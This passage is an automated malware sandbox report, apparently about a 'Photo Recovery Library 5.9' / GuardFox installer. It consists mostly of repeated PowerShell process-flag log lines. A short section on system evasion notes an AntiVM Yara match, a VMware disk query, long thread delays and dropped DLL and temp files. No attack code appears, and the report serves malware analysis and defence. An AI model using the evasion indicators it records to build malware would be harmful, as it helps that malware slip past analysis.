            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7444, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeMemory allocated: 1AF30000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,14_2_02D3E9B6
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7168Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2652Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6241
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3242
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\libGLESv2.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-4V98D.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\icuuc51.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\libEGL.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\msvcp100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\Qt5Concurrent.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-9CIKO.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-DLELP.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-N40N4.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-9TUU2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-G5VHU.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NKCMI.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\uninstall\is-PDB6I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\is-HHAV6.tmpJump to dropped file
